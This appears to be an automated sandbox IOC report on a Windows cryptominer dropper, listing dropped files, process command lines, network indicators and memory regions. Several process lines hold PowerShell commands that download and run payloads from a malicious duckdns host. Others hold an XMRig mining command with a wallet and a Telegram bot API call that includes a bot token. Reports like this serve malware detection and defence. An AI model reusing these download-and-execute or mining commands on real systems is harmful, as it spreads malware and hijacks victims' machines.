IOC Report
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\ProgramData\Drivers\WinRing0x64.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\ProgramData\Drivers\process.bat
ASCII text, with no line terminators
dropped
malicious
C:\ProgramData\Drivers\watch.bat
ASCII text
dropped
malicious
C:\ProgramData\Drivers\xmrig.exe
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\down.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\down.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp.vbs
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\1.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\2.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\6.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\ProgramData\Drivers\1.vbs
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Drivers\winproc.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eg31ikpo.otb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekyqirro.1xp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4vfh2ga.bdz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hflv144m.f2n.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbht0ckn.erv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd4nmdyl.d0y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Archive, ctime=Thu Mar 28 08:25:34 2024, mtime=Thu Mar 28 08:25:34 2024, atime=Sun Oct 8 01:17:00 2023, length=122, window=hide
dropped
There are 13 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe"
malicious
C:\Users\user\AppData\Roaming\6.exe
"C:\Users\user\AppData\Roaming\6.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\ProgramData\Drivers\xmrig.exe
xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Users\user\AppData\Roaming\1.exe
"C:\Users\user\AppData\Roaming\1.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\curl.exe
curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "IMAGENAME eq xmrig.exe"
malicious
C:\Windows\System32\tasklist.exe
tasklist /NH /FI "imagename eq taskmgr.exe"
malicious
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
C:\Users\user\AppData\Local\Temp\tmp.vbs
C:\Users\user\AppData\Local\Temp\tmp.vbs
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\find.exe
find /i "taskmgr.exe"
C:\Windows\System32\timeout.exe
timeout /t 1 /nobreak
There are 45 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://puredgb.duckdns.org:30000/hyar8z46/discord.exe
200.165.100.3
malicious
http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe
200.165.100.3
malicious
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
200.165.100.3
malicious
http://puredgb.duckdns.org:30000
unknown
malicious
http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe
200.165.100.3
malicious
http://puredgb.duckdns.org:30000/6nif5f8r/address.exe
200.165.100.3
malicious
http://puredgb.duckdns.org
unknown
malicious
http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe
200.165.100.3
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://crl.microsoftH
unknown
https://curl.se/docs/http-cookies.html
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://xmrig.com/wizard%s
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://curl.se/docs/alt-svc.html
unknown
https://xmrig.com/wizard
unknown
https://github.com/Pester/Pester
unknown
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
unknown
http://decimate.online
unknown
https://curl.se/docs/hsts.html
unknown
https://curl.se/docs/alt-svc.html#
unknown
http://crl.m
unknown
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success
149.154.167.220
http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe4
unknown
https://curl.se/docs/hsts.html#
unknown
https://ibb.co/pjHVbzL).
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://decimate.onlinehey
unknown
https://oneget.orgX
unknown
https://xmrig.com/docs/algorithms
unknown
https://xmrig.com/benchmark/%s
unknown
https://aka.ms/pscore68
unknown
https://curl.se/docs/http-cookies.html#
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://oneget.org
unknown
There are 31 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
puredgb.duckdns.org
200.165.100.3
malicious
api.telegram.org
149.154.167.220
pool-nyc.supportxmr.com
104.243.43.115
pool.supportxmr.com
unknown

IPs

IP
Domain
Country
Malicious
200.165.100.3
puredgb.duckdns.org
Brazil
malicious
149.154.167.220
api.telegram.org
United Kingdom
104.243.33.118
unknown
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1CD41524000
heap
page read and write
malicious
1CD42E5D000
heap
page read and write
malicious
1CD42E52000
heap
page read and write
malicious
1CD415A9000
heap
page read and write
malicious
1CD41520000
heap
page read and write
malicious
7FF751980000
unkown
page write copy
malicious
1CD42E7F000
heap
page read and write
malicious
7FF75148F000
unkown
page readonly
malicious
1CD42EE7000
heap
page read and write
malicious
1B665FA7000
heap
page read and write
malicious
1CD415A0000
heap
page read and write
malicious
1B666732000
heap
page read and write
malicious
1DDAA771000
trusted library allocation
page read and write
malicious
1B6665A5000
heap
page read and write
malicious
1CD25195000
heap
page read and write
1B663F20000
trusted library allocation
page read and write
7FF7332FC000
unkown
page readonly
1DDA9120000
heap
page execute and read and write
1B663FA2000
heap
page read and write
1B665FAC000
heap
page read and write
218A3B18000
heap
page read and write
20ECD660000
heap
page read and write
7FFE7DD00000
trusted library allocation
page read and write
25DEFB80000
heap
page read and write
1B662002000
heap
page read and write
2AC61CC4000
heap
page read and write
2FCC1FB000
stack
page read and write
2847744A000
unkown
page read and write
2AC61C78000
heap
page read and write
F95BFFE000
stack
page read and write
1A29FED3000
heap
page read and write
1DDA742D000
heap
page read and write
2A09FB000
stack
page read and write
23ABBAD000
stack
page read and write
42BBBFF000
stack
page read and write
7FF7332FC000
unkown
page write copy
5523AFE000
stack
page read and write
1DDA73E6000
heap
page read and write
7FFE7DA34000
trusted library allocation
page read and write
1FC3D41D000
heap
page read and write
1A29FE47000
heap
page read and write
15542F50000
heap
page read and write
7FFE7DCB0000
trusted library allocation
page read and write
2295C4B6000
heap
page read and write
1B6620CD000
heap
page read and write
7FF7332D8000
unkown
page readonly
253C7EDC000
heap
page read and write
1DD59A38000
heap
page read and write
1832B417000
heap
page read and write
246FFAB4000
heap
page read and write
7FF6C576C000
unkown
page readonly
235C64D0000
heap
page read and write
237D1CA8000
heap
page read and write
218A3CA0000
heap
page read and write
1832B3F0000
heap
page read and write
1CD25162000
heap
page read and write
284792B0000
unkown
page readonly
20ECD680000
remote allocation
page read and write
175F2BE4000
heap
page read and write
1B6656A0000
trusted library allocation
page read and write
67AEEF7000
stack
page read and write
203C0E30000
heap
page read and write
59188FE000
stack
page read and write
1F0AF804000
heap
page read and write
235C63FE000
heap
page read and write
1CD42F0F000
heap
page read and write
F95BF7F000
stack
page read and write
FD8B8FF000
stack
page read and write
1B663FF7000
heap
page read and write
20D3BA40000
heap
page read and write
22FA362C000
heap
page read and write
672417E000
stack
page read and write
7FFE7DB36000
trusted library allocation
page execute and read and write
7FF6C575B000
unkown
page read and write
7FFE7DA40000
trusted library allocation
page read and write
228B41C4000
heap
page read and write
28477314000
unkown
page read and write
1A2A3451000
heap
page read and write
1A2B5047000
heap
page read and write
B5056FE000
stack
page read and write
218A3AE0000
heap
page read and write
175F2BE0000
heap
page read and write
1BA53259000
heap
page read and write
1DEE780E000
heap
page read and write
237D5711000
trusted library allocation
page read and write
1E073754000
heap
page read and write
1A29FE8A000
heap
page read and write
2287EEA4000
heap
page read and write
4AD779F000
stack
page read and write
1A3C9437000
heap
page read and write
20ECD76D000
heap
page read and write
253C7F50000
heap
page read and write
1B662051000
heap
page read and write
218A3B2D000
heap
page read and write
28D587F000
stack
page read and write
2287ECC2000
heap
page read and write
2295C4FF000
heap
page read and write
B693F2B000
stack
page read and write
1A3CB2D0000
heap
page execute and read and write
29122ABB000
heap
page read and write
1DDA9DB2000
trusted library allocation
page read and write
25DEFC66000
heap
page read and write
1F0AF5CE000
heap
page read and write
1B663F20000
heap
page read and write
1CD25174000
heap
page read and write
428307F000
stack
page read and write
281C3FA0000
heap
page read and write
1B6620B5000
heap
page read and write
1DEE77B0000
heap
page read and write
49FDE7F000
stack
page read and write
727FFFF000
stack
page read and write
160D0B88000
heap
page read and write
7FFE7DAE6000
trusted library allocation
page read and write
5A9F17F000
stack
page read and write
7FFE7DCF0000
trusted library allocation
page read and write
42BBE7F000
stack
page read and write
1F7F9BE0000
heap
page read and write
672510D000
stack
page read and write
160D0AF0000
heap
page read and write
25DEFAA0000
heap
page read and write
1A3CAE50000
heap
page read and write
28476DE0000
unkown
page readonly
67AEC7C000
stack
page read and write
28D58FF000
stack
page read and write
7FFE7DA52000
trusted library allocation
page read and write
893C52F000
stack
page read and write
1A3C93FD000
heap
page read and write
28475764000
heap
page read and write
1CD250E8000
heap
page read and write
1A29FE82000
heap
page read and write
220ED2F000
stack
page read and write
203C0BCC000
heap
page read and write
1B663FF6000
heap
page read and write
1DDAA2F6000
trusted library allocation
page read and write
F02487E000
stack
page read and write
7FF7033FE000
unkown
page readonly
9297BFB000
stack
page read and write
1DDC1327000
heap
page execute and read and write
1B661FD0000
heap
page read and write
1F7F9BE4000
heap
page read and write
67240FF000
stack
page read and write
1CD4AC85000
heap
page read and write
15ED1990000
heap
page read and write
1B662021000
heap
page read and write
CA2A8FE000
stack
page read and write
237D3A70000
heap
page execute and read and write
281C5B44000
heap
page read and write
1A29FED3000
heap
page read and write
1CD25221000
trusted library allocation
page read and write
2AC61C9B000
heap
page read and write
7FFE7DA33000
trusted library allocation
page execute and read and write
29122A70000
heap
page read and write
7FF6C575B000
unkown
page write copy
1F7F8160000
heap
page read and write
20ECD73E000
heap
page read and write
1DDA7461000
heap
page read and write
237EBC1F000
heap
page read and write
1B6620B7000
heap
page read and write
193BE100000
heap
page read and write
7FF703381000
unkown
page execute read
B6943FF000
stack
page read and write
284753D1000
unkown
page readonly
1DDC15EF000
heap
page read and write
1A2B4FF0000
heap
page read and write
92976FF000
stack
page read and write
B5054FF000
stack
page read and write
7FF6C5762000
unkown
page read and write
59189FF000
stack
page read and write
1A2A1F00000
heap
page read and write
1A3CAD50000
heap
page read and write
EDD437F000
stack
page read and write
175F10D0000
heap
page read and write
237D35B4000
heap
page read and write
1B664128000
heap
page read and write
1CD41500000
direct allocation
page execute read
7FF6C5701000
unkown
page execute read
1832B620000
heap
page read and write
1F0AF5D3000
heap
page read and write
218A3B1E000
heap
page read and write
1832B410000
heap
page read and write
15ED19DC000
heap
page read and write
1DEE7878000
heap
page read and write
28D59FE000
stack
page read and write
193BE050000
heap
page read and write
1E0737DB000
heap
page read and write
1B66201B000
heap
page read and write
CDE227F000
stack
page read and write
7FF75C30C000
unkown
page readonly
28477514000
unkown
page read and write
160D0B9E000
heap
page read and write
1A3CCF64000
trusted library allocation
page read and write
6724337000
stack
page read and write
1A29FE63000
heap
page read and write
15ED1980000
heap
page read and write
1F0AF4D0000
heap
page read and write
20DC2C20000
heap
page read and write
1A2B4FD0000
heap
page read and write
1A29FE8A000
heap
page read and write
2295C4F1000
heap
page read and write
7FFE7DCD0000
trusted library allocation
page read and write
160D0B91000
heap
page read and write
1DDC1390000
heap
page read and write
7FFE7DA60000
trusted library allocation
page read and write
7FF6C5768000
unkown
page readonly
7FFE7DD10000
trusted library allocation
page read and write
2D1137D000
stack
page read and write
1B665FA1000
heap
page read and write
BACA97B000
unkown
page read and write
7FFE7DD90000
trusted library allocation
page read and write
2A0BFC000
stack
page read and write
1DDC1408000
heap
page read and write
1A3E3800000
heap
page read and write
237D50BC000
trusted library allocation
page read and write
1B663FE9000
heap
page read and write
25DEFC6B000
heap
page read and write
4CCCCFE000
stack
page read and write
218A3B06000
heap
page read and write
1A2A1EC3000
heap
page read and write
1B6666E7000
heap
page read and write
15542CB0000
heap
page read and write
25DEFC8C000
heap
page read and write
1B663F21000
heap
page read and write
237EBCBE000
heap
page read and write
1A3C940F000
heap
page read and write
59185DF000
stack
page read and write
F6BCCFE000
stack
page read and write
DA9187E000
stack
page read and write
203C0BBE000
heap
page read and write
218A3B32000
heap
page read and write
291229B0000
heap
page read and write
2287EC20000
heap
page read and write
7FFE7DB10000
trusted library allocation
page execute and read and write
1FC3D760000
heap
page read and write
1F0AF800000
heap
page read and write
253C8030000
heap
page read and write
1B663FE6000
heap
page read and write
7FF6C576C000
unkown
page write copy
2096B750000
heap
page read and write
1CD2523A000
trusted library allocation
page read and write
1A3DB3AC000
trusted library allocation
page read and write
7FFE7DC40000
trusted library allocation
page read and write
1B662009000
heap
page read and write
28476E03000
heap
page read and write
1B6665A2000
heap
page read and write
2A11FF000
stack
page read and write
F0247FE000
stack
page read and write
4CCCDFE000
stack
page read and write
1A29FE64000
heap
page read and write
1CD413D0000
heap
page read and write
20ECD737000
heap
page read and write
7FF703421000
unkown
page write copy
7FF733290000
unkown
page readonly
893C4AC000
stack
page read and write
2287ECD6000
heap
page read and write
1DDA7290000
heap
page read and write
218A3B0C000
heap
page read and write
7FFE7DA34000
trusted library allocation
page read and write
F0248FF000
stack
page read and write
1CD270F5000
heap
page read and write
2A15FF000
stack
page read and write
281C4018000
heap
page read and write
237E3AE0000
trusted library allocation
page read and write
1A3CB3AC000
trusted library allocation
page read and write
28477850000
unkown
page readonly
DA917FF000
stack
page read and write
544907B000
stack
page read and write
3D041FB000
stack
page read and write
7FFE7DD50000
trusted library allocation
page read and write
20D3BA14000
heap
page read and write
7FFE7DA54000
trusted library allocation
page read and write
1CD270FD000
heap
page read and write
67244BE000
stack
page read and write
F6BD1FD000
stack
page read and write
1DDAA76D000
trusted library allocation
page read and write
F4B550F000
stack
page read and write
20DC2BF0000
heap
page read and write
F4B597E000
stack
page read and write
727FF7E000
stack
page read and write
1DDB9190000
trusted library allocation
page read and write
20DC2CEF000
heap
page read and write
1B662051000
heap
page read and write
1CD25179000
heap
page read and write
B5052FA000
stack
page read and write
1B664128000
heap
page read and write
7FFE7DB00000
trusted library allocation
page read and write
235C63E8000
heap
page read and write
228B2970000
heap
page read and write
1A3CAE40000
trusted library allocation
page read and write
1DDA74A0000
heap
page read and write
1CD26EF0000
heap
page read and write
54D08FE000
stack
page read and write
7FF75147E000
unkown
page write copy
42BBB7C000
stack
page read and write
1DDC1187000
heap
page read and write
F95BEFF000
stack
page read and write
218A3950000
heap
page read and write
237EC0A0000
heap
page read and write
2096D144000
heap
page read and write
2D10DEE000
stack
page read and write
1DDC13EB000
heap
page read and write
54D0AFB000
stack
page read and write
2FCBAFE000
stack
page read and write
7FFE7DBD0000
trusted library allocation
page read and write
237D1CC0000
heap
page read and write
1CD42E9E000
heap
page read and write
1DD59A7D000
heap
page read and write
7FF75C30C000
unkown
page write copy
7FFE7DA33000
trusted library allocation
page execute and read and write
1A3E33FF000
heap
page read and write
B69427E000
stack
page read and write
1BA53260000
heap
page read and write
1B6620B4000
heap
page read and write
7FFE7DCD0000
trusted library allocation
page read and write
1CD251A0000
heap
page read and write
7FFE7DB50000
trusted library allocation
page execute and read and write
20ECD680000
remote allocation
page read and write
F6BD3FF000
stack
page read and write
2287EC80000
heap
page read and write
7FF733291000
unkown
page execute read
28475370000
unkown
page readonly
1A2A0020000
heap
page read and write
2D1107E000
stack
page read and write
7FFE7DD60000
trusted library allocation
page read and write
1B663F61000
heap
page read and write
228B2780000
heap
page read and write
1CD42EEF000
heap
page read and write
7FFE7DCC0000
trusted library allocation
page read and write
160D0AE0000
heap
page read and write
22FA362E000
heap
page read and write
175F2A80000
heap
page read and write
1DD59A83000
heap
page read and write
1DEE7804000
heap
page read and write
1DD59A55000
heap
page read and write
1CD414B0000
heap
page read and write
1B66201B000
heap
page read and write
29122ABE000
heap
page read and write
7FFE7DD90000
trusted library allocation
page read and write
5A9EDFF000
stack
page read and write
1DD59A5B000
heap
page read and write
1CD46685000
heap
page read and write
2AC61C95000
heap
page read and write
1DDB9330000
trusted library allocation
page read and write
20ECD75A000
heap
page read and write
2295C320000
heap
page read and write
235C63FE000
heap
page read and write
67AEDFD000
stack
page read and write
15ED1A08000
heap
page read and write
2D116FD000
stack
page read and write
4282D4C000
stack
page read and write
2D113F8000
stack
page read and write
B5059FD000
stack
page read and write
1B6620CD000
heap
page read and write
22FA36F0000
heap
page read and write
7FF703424000
unkown
page read and write
2096D140000
heap
page read and write
67AECFE000
stack
page read and write
1CD42EE7000
heap
page read and write
7FFE7DB50000
trusted library allocation
page execute and read and write
7FF703380000
unkown
page readonly
3D03AFE000
stack
page read and write
20ECD728000
heap
page read and write
1BA53350000
heap
page read and write
1DEE76D0000
heap
page read and write
237E3B3F000
trusted library allocation
page read and write
2AC61C96000
heap
page read and write
1CD42E6D000
heap
page read and write
1CD25103000
heap
page read and write
237D1C30000
heap
page read and write
6723FFE000
stack
page read and write
F6BCAFA000
stack
page read and write
22FA3611000
heap
page read and write
E0228FF000
stack
page read and write
BACA77C000
unkown
page read and write
2AC61C95000
heap
page read and write
1A3C9360000
heap
page read and write
7FF75C2FB000
unkown
page read and write
1B66206C000
heap
page read and write
1DD59C40000
heap
page read and write
1DD59A66000
heap
page read and write
1CD41560000
direct allocation
page execute and read and write
28477150000
unkown
page read and write
7FFE7DC50000
trusted library allocation
page read and write
2287ECA7000
heap
page read and write
F02477F000
stack
page read and write
218A3A30000
heap
page read and write
2847723E000
unkown
page read and write
235C63D6000
heap
page read and write
1CD2875D000
heap
page read and write
7FFE7DB70000
trusted library allocation
page execute and read and write
1A3E3842000
heap
page read and write
1B662063000
heap
page read and write
1A2A1F40000
heap
page read and write
20ECD7B5000
heap
page read and write
1E073750000
heap
page read and write
25DEFC8C000
heap
page read and write
25DEFC65000
heap
page read and write
203C0BA6000
heap
page read and write
1D21D8E000
stack
page read and write
6723E73000
stack
page read and write
22FA3618000
heap
page read and write
1A3CCC1C000
trusted library allocation
page read and write
160D0E24000
heap
page read and write
552377F000
stack
page read and write
1F7F81C0000
heap
page read and write
1A2B504A000
heap
page read and write
1A3C9730000
heap
page read and write
1B661EE0000
heap
page read and write
7FFE7DCF0000
trusted library allocation
page read and write
237EBC96000
heap
page read and write
1CD25080000
heap
page read and write
218A3B21000
heap
page read and write
67AFCCF000
stack
page read and write
1CD26E70000
heap
page read and write
28477536000
unkown
page read and write
BACA9FE000
unkown
page readonly
1B662051000
heap
page read and write
672534D000
stack
page read and write
2A09FD000
stack
page read and write
1A2A1EC3000
heap
page read and write
237D52CF000
trusted library allocation
page read and write
1CD27290000
heap
page read and write
7FFE7DC40000
trusted library allocation
page read and write
1CD44885000
heap
page read and write
67AEAFE000
stack
page read and write
160D0B50000
heap
page read and write
1CD25070000
heap
page readonly
7FF7332EB000
unkown
page write copy
1B66671B000
heap
page read and write
1CD42EE7000
heap
page read and write
1CD42EA2000
heap
page read and write
20ECD680000
remote allocation
page read and write
203C0BD0000
heap
page read and write
237D1C67000
heap
page read and write
1A3E3832000
heap
page read and write
22FA3630000
heap
page read and write
1FC3D3FC000
heap
page read and write
7FFE7DBD0000
trusted library allocation
page read and write
7FFE7DC30000
trusted library allocation
page read and write
1B6620F0000
heap
page read and write
1DDA746F000
heap
page read and write
1A3E3849000
heap
page read and write
2847742A000
unkown
page read and write
2AC61C70000
heap
page read and write
1A3E33FD000
heap
page read and write
228B2870000
heap
page read and write
1A29FE87000
heap
page read and write
22FA3954000
heap
page read and write
54D07FE000
stack
page read and write
228B4140000
heap
page read and write
1B6640E3000
heap
page read and write
7FF7332D8000
unkown
page readonly
1DDAA7C9000
trusted library allocation
page read and write
F95BE7F000
stack
page read and write
253C8060000
heap
page read and write
1DDA73EA000
heap
page read and write
2295C4F3000
heap
page read and write
7FF75C2A0000
unkown
page readonly
1DDB91EE000
trusted library allocation
page read and write
